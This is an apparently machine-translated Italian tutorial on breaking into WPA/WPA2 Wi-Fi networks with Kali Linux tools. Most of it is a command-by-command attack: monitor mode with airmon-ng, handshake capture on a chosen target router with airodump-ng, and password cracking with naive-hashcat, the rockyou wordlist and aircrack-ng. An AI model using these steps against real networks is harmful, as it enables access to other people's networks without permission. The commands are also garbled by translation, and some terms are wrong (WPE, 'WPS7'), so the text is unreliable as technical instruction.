introduzione
La fedeltà wireless, o Wi-Fi, è un tipo di tecnologia impiegata per fornire connettività a una rete di computer senza cavo o connessione cablata. Wi-Fi funziona all'interno del 2.Range da 4 GHz a 5 GHz e non dovrebbe interferire con i cellulari, la radio trasmessa, la televisione o le radio portatili. Wi-Fi funzioni trasmettendo i dati su onde radio tra un dispositivo client e un dispositivo chiamato router. Un router può trasmettere dati ai sistemi internamente o esternamente su Internet. Il Wi-Fi non è né più né meno sicuro di una tradizionale rete cablata, ma è invece un'interfaccia completamente diversa. La cosa più importante da ricordare è che la privacy equivalente cablata (WEP) è stata rilasciata nel 1997 ed è facile da irrompere. WEP può essere rotto in minuti o meno. I tuoi dispositivi moderni non funzionano con la rete WEP e la maggior parte dei router non la supporta più. Il WEP aggiornato può anche essere suddiviso tramite metodi di hacking.
Hacking
In poche parole, per rompere o rompere le informazioni personali di qualcuno è noto come hacking. Gli hacker possono accedere facilmente al tuo dispositivo personale o al tuo computer. Possono rompere i tuoi passcodi e ottenere l'accesso alla tua rete wireless. Possono aggirare la sicurezza della rete wireless e interrompere, indipendentemente dal tipo di crittografia che l'utente sta utilizzando.
In genere, se vuoi entrare nella rete wireless di qualcuno, dovrai prima sapere della crittografia utilizzata. Come accennato in precedenza, la rete di tipo WPE non è stata sicura da un po 'di tempo. In genere può essere suddiviso in pochi minuti. Lo stesso vale per la rete WPA se si utilizza una password debole. Tuttavia, se si utilizza una password forte, è relativamente sicura, ad eccezione del pin WPS7. Questa è una vulnerabilità della base di hardware che molti router usano, consentendo agli hacker di ottenere il PIN che fornisce l'accesso completo al router. Questo è di solito un numero di otto cifre scritto in fondo al router. Puoi derivare questo numero seguendo i passaggi seguenti.
Terminal Kali Linux aperto
Il primo passo è semplicemente aprire il terminale Kali Linux. Per fare ciò, premere Alt+ctrl+t. Puoi anche premere sull'icona dell'app terminale per aprire il terminale.
Immettere il comando per l'installazione Aircrack-Ng
Il prossimo passo è installare Aircrack-ng. Immettere il seguente comando per farlo:
$ sudo apt-get Installa Aircrack-ng
Immettere la password per accedere
Immettere la password di root per abilitare l'accesso. Dopo aver inserito la password di accesso, premere il accedere pulsante per continuare.
Installa Aircrack-Ng
Poco dopo l'accesso, premere il pulsante Y. Ciò consentirà l'installazione di Aircrack-ng.
Accendi Airmon-Ng
Airmon-ng è il software utilizzato per convertire la modalità gestita in modalità monitoraggio. Usa il comando seguente per attivare Airmon-Ng:
$ Airmon-ng
Trova il nome del monitor
Il prossimo passo è trovare il nome del monitor per continuare l'hacking. È possibile visualizzare il nome del monitor nella colonna dell'interfaccia. In alcuni casi, potresti non essere in grado di visualizzare il nome del monitor. Questo errore si verifica se la scheda non è supportata.
Inizia a monitorare la rete
Immettere il seguente comando per iniziare il processo di monitoraggio:
$ Airmon-ng avvia wlan0
Se stai prendendo di mira un'altra rete, allora dovresti sostituire "WLAN0" con il nome della rete corretto.
Abilita l'interfaccia della modalità monitor
Il seguente comando viene utilizzato per abilitare l'interfaccia della modalità Monitor:
$ iwconfig
Uccidi i processi che restituiscono errori
Il tuo sistema può causare qualche interferenza. Utilizzare il comando seguente per rimuovere questo errore.
$ AIRMON-NG Control Kill
Rivedi l'interfaccia monitor
Il prossimo passo è rivedere il nome del monitor. In questo caso, si chiama 'wlan0mon.'
Ottieni nomi di tutti i router
I nomi di tutti i router disponibili appariranno dopo aver inserito il seguente comando.
$ AIRODUMP-NG MON0
Trova il nome del router
Per prima cosa dovrai trovare il nome del router specifico che vuoi hackerare.
Assicurarsi che il router utilizzi la sicurezza WPA o WPA2
Se il nome WPA viene visualizzato sullo schermo, puoi continuare a hackerare.
Nota l'indirizzo MAC e il numero del canale.
Queste sono le informazioni di base sulla rete. Puoi visualizzarli sul lato sinistro della rete.
Monitorare la rete selezionata
Utilizzare il seguente comando per monitorare i dettagli della rete che si desidera hackerare.
$ AirODUMP -NG -C Canale --BSSID Mac -w/root/desktop/mon0
Aspetta la stretta di mano
Aspetta di vedere "WPA Handshake" scritto sullo schermo.
Esci dalla finestra premendo Ctrl+c. Verrà visualizzato un file CAP nella schermata del tuo computer.
Rinomina il file CAP
Per la tua facilità, puoi modificare il nome del file. Usa il seguente comando per questo scopo:
$ MV ./-01.Nome del cappello.cappuccio
Converti il file in formato HCCAPX
È possibile convertire facilmente il file in formato HCCAPX con l'aiuto del convertitore Kali.
Usa il seguente comando per farlo:
$ cap2hccapx.Nome cestino.Nome del cappello.HCCAPX
Installa il cat di cattura ingenuo
Ora puoi rompere la password utilizzando questo servizio. Usa il comando seguente per iniziare a cracking.
$ sudo git clone https: // github.com/Brandorsey/Naive-Hashcat
$ CD CD Naive-Hash-Cat
$ CURL -L -O DICTS/ROCKYOU.TXT
Corri ingenuo-hash-gat
Per eseguire il servizio ingenuo-hash-gat, immettere il comando seguente:
$ Hash_file = nome.HCCAPX Pot_file = Nome.Pot hash_type = 2500 ./Naive-Hash-Cat.sh
Attendi che la password di rete sia rotta
Non appena la password sarà rotta, verrà menzionata nel file. Questo processo può richiedere mesi o addirittura anni per essere completato. Immettere il comando seguente quando questo processo viene completato per salvare la password. La password incrociata è mostrata nell'ultimo screenshot.
[cc lang = "bash" width = "780"]
$ AIRCRACK -NG -A2 -B MAC -w Rockyou.Nome txt.cappuccio
[CC]
Conclusione
Usando Kali Linux e i suoi strumenti, l'hacking può diventare facile. È possibile ottenere facilmente l'accesso alle password semplicemente seguendo i passaggi sopra elencati. Spero che questo articolo ti aiuti a rompere la password e diventare un hacker etico.